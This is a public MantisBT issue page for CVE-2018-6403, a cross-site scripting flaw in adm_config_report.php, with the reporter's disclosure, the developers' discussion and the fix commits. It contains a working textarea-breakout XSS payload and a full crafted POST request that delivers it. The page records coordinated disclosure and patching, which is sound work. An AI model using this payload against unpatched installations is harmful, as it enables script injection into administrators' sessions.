View Issue Details

ID: 0023906
Project: mantisbt
Category: security
View Status: public
Last Update: 2018-02-06 21:17
Reporter: tuanklnew
Assigned To: dregad
Priority: normal
Severity: minor
Reproducibility: always
Status: closed
Resolution: fixed
Product Version: 1.3.0
Target Version: 2.10.1
Fixed in Version: 2.10.1
Summary: 0023906: CVE-2018-6403: XSS in adm_config_report.php 'value' parameter
Description

Elements of the POST array "value" (I tested on fixed_in_version, project_id, id) on adm_config_report.php can have scripts added (in my case </textarea><iframe src=javascript:alert(1212) ). That script is in the response HTML and is executed by the web browser.

This vulnerability affects Mantis 2.8 and 2.10 (I have not tested on 2.9 due to lack of time).

Steps To Reproduce

Parameters need to be filtered properly before they are accepted and returned to the client.

Tags: No tags attached.

Relationships

has duplicate 0023918 (closed, dregad): CVE-2018-6403: XSS in adm_config_report.php 'value' parameter

Activities

tuanklnew  2018-01-29 03:36  reporter

Attachments: script_executed.PNG (3,145 bytes)

modified_POST.txt (892 bytes):
POST /mantisbt/adm_config_report.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer: http://192.168.70.11/mantisbt/adm_config_report.php
Cookie: MANTIS_secure_session=1;
MANTIS_STRING_COOKIE=6xgdamq8V5fgA4vDchh450KI4bKW2kxYeNRdhYfw4cvWrMPmBa7KMqx2HDi7QbsW;
PHPSESSID=ll27va6a7c2r3rv8m75phoraa7
Host: 192.168.70.11
Content-Length: 353
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
user_id=0&project_id=0&config_option=csv_columns&type=3&value=["id","project_id","reporter_id","handler_id","priority","severity","reproducibility","version","category_id","date_submitted","os","os_build","platform","view_state","last_updated","summary","status","resolution","fixed_in_version</textarea><iframe src=javascript:alert(1212) "]&action=edit
respond.html (19,430 bytes)
dregad  2018-01-29 09:30  developer  ~0058660

Thank you for the bug report, we'll look into it.

Did you request a CVE ID for this vulnerability, or should we do it? How would you like to be credited for the finding?

tuanklnew  2018-01-29 10:00  reporter  ~0058661

May I have a CVE ID for this vulnerability? There are still other vulnerabilities. I am working to find out how serious they are. I will report the issues when I get results.

vboctor  2018-01-29 23:10  manager  ~0058666

It is worth noting that setting configuration is allowed for administrators, as per the recommendation and default config:

$g_set_configuration_threshold = ADMINISTRATOR;

tuanklnew  2018-01-30 02:50  reporter  ~0058671

But it is still a vulnerability. I think you should fix it in Mantis 2.10.1.

dregad  2018-01-30 03:20  developer  ~0058672

> But it is still a vulnerability. I think you should fix it in Mantis 2.10.1.

We'll fix it, don't worry.

> May I have CVE ID for this vulnerability

I'll post it here when MITRE assigns it.

You have not answered my question:

> How would you like to be credited for the finding?

dregad  2018-01-30 05:50  developer  ~0058674

Last edited: 2018-01-30 06:22

I confirm the vulnerability, reproducible on my local dev box, in 1.3.x branch also (tested from 1.3.0 onwards).

I'd also like to point out that the risk is mitigated (with default settings and modern browsers): the XSS is not exploitable due to our CSP headers.

dregad  2018-01-30 06:58  developer  ~0058678

CVE request 456011 sent

vboctor  2018-01-30 12:12  manager  ~0058682

I wasn't indicating that we shouldn't fix it, but we should make it clear in the CVE that administrators by default can attack themselves.

dregad  2018-01-31 03:33  developer  ~0058692

CVE-2018-6403 assigned.

dregad  2018-01-31 07:01  developer  ~0058697

@tuanklnew I pushed a commit that fixes the vulnerability as far as I can tell; please confirm that it's OK from your end as well.

tuanklnew  2018-02-04 20:30  reporter  ~0058742

@dregad let me check.

tuanklnew  2018-02-04 21:41  reporter  ~0058743

I've checked. It's fixed.

dregad  2018-02-05 01:49  developer  ~0058744

Thanks for the feedback!

Related Changesets

MantisBT: master-2.10 c4afcb11  2018-01-30 06:58:29  dregad

Fix XSS in adm_config_report.php (CVE-2018-6403)

Nguyen Tri Tuan reported this vulnerability, allowing an attacker to
inject arbitrary code through a crafted 'value' parameter.

Prevent the attack by sanitizing the variable before output.

Fixes 0023906
Affected Issues: 0023906
mod - adm_config_report.php

MantisBT: master-1.3.x 9e4db60a  2018-01-30 06:58:29  dregad

Fix XSS in adm_config_report.php (CVE-2018-6403)

Nguyen Tri Tuan reported this vulnerability, allowing an attacker to
inject arbitrary code through a crafted 'value' parameter.

Prevent the attack by sanitizing the variable before output.

Fixes 0023906, 0023918

Cherry-picked from c4afcb118472fef8d3a7f468b16d874f9d6cf871.
Affected Issues: 0023906, 0023918
mod - adm_config_report.php
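As an added illustration (not MantisBT's own code and not the patch in the changesets above, which this page does not show): the vulnerable output pattern the report describes, beside the output-encoding fix the commit message refers to as "sanitizing the variable before output". The function names and the sample value are constructed for this example.

```php
<?php
// Added illustration, not MantisBT's own code: a config value submitted via
// POST is echoed back into a <textarea> of an edit form, as on
// adm_config_report.php. Function names and the sample value are constructed.
declare(strict_types=1);

// Vulnerable pattern: the raw value is concatenated into the HTML. A value
// containing "</textarea>" closes the element early and everything after it
// is parsed as markup, which is the breakout the report demonstrates.
function render_value_textarea_vulnerable(string $value): string
{
    return '<textarea name="value">' . $value . '</textarea>';
}

// Hardened pattern: HTML-encode the value before output. "<" becomes "&lt;",
// so no submitted text can close the textarea; ENT_QUOTES also makes the
// helper safe if the same value is ever placed inside an attribute.
function render_value_textarea_safe(string $value): string
{
    $encoded = htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<textarea name="value">' . $encoded . '</textarea>';
}

// Regression check: after removing the single textarea the template itself
// emits, does anything the HTML parser would treat as a tag remain?
function textarea_breakout(string $html): bool
{
    $inner = preg_replace('#^<textarea name="value">(.*)</textarea>$#s', '$1', $html, 1);
    return $inner !== null && preg_match('#<\s*/?\s*[a-z]#i', $inner) === 1;
}

// Constructed sample shaped like the report's PoC: a JSON array for the
// csv_columns option whose last element breaks out of the textarea.
$value = '["id","summary","fixed_in_version</textarea><iframe src=javascript:alert(1212) "]';

var_dump(textarea_breakout(render_value_textarea_vulnerable($value)));
var_dump(textarea_breakout(render_value_textarea_safe($value)));
```

Output encoding is the actual fix; the CSP headers mentioned in the notes are defence in depth that only limits what an injected tag can do in browsers that enforce the policy.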

Issue History

Date Modified Username Field Change
2018-01-29 03:36 tuanklnew New Issue
2018-01-29 03:36 tuanklnew File Added: script_executed.PNG
2018-01-29 03:36 tuanklnew File Added: modified_POST.txt
2018-01-29 03:36 tuanklnew File Added: respond.html
2018-01-29 09:30 dregad Note Added: 0058660
2018-01-29 09:32 dregad Status new => acknowledged
2018-01-29 10:00 tuanklnew Note Added: 0058661
2018-01-29 23:10 vboctor Note Added: 0058666
2018-01-29 23:12 vboctor Target Version => 2.10.1
2018-01-30 02:50 tuanklnew Note Added: 0058671
2018-01-30 03:20 dregad Note Added: 0058672
2018-01-30 05:50 dregad Status acknowledged => confirmed
2018-01-30 05:50 dregad Note Added: 0058674
2018-01-30 06:22 dregad Note Edited: 0058674 View Revisions
2018-01-30 06:22 dregad Product Version 2.10.0 => 1.3.0
2018-01-30 06:58 dregad Note Added: 0058678
2018-01-30 12:12 vboctor Note Added: 0058682
2018-01-31 03:33 dregad Assigned To => dregad
2018-01-31 03:33 dregad Status confirmed => assigned
2018-01-31 03:33 dregad Summary POST array "value" of adm_config_report.php is affected by Cross-site scripting vulnerability => CVE-2018-6403: XSS in adm_config_report.php 'value' parameter
2018-01-31 03:33 dregad Note Added: 0058692
2018-01-31 06:53 dregad Issue cloned: 0023918
2018-01-31 06:53 dregad Relationship added has duplicate 0023918
2018-01-31 06:54 dregad Changeset attached => MantisBT master-2.10 c4afcb11
2018-01-31 06:54 dregad Status assigned => resolved
2018-01-31 06:54 dregad Resolution open => fixed
2018-01-31 06:54 dregad Changeset attached => MantisBT master-1.3.x 9e4db60a
2018-01-31 06:54 dregad Fixed in Version => 1.3.14
2018-01-31 06:57 dregad Fixed in Version 1.3.14 => 2.10.1
2018-01-31 06:57 dregad View Status private => public
2018-01-31 07:01 dregad Note Added: 0058697
2018-02-04 20:30 tuanklnew Note Added: 0058742
2018-02-04 21:41 tuanklnew Note Added: 0058743
2018-02-05 01:49 dregad Note Added: 0058744
2018-02-06 21:17 vboctor Status resolved => closed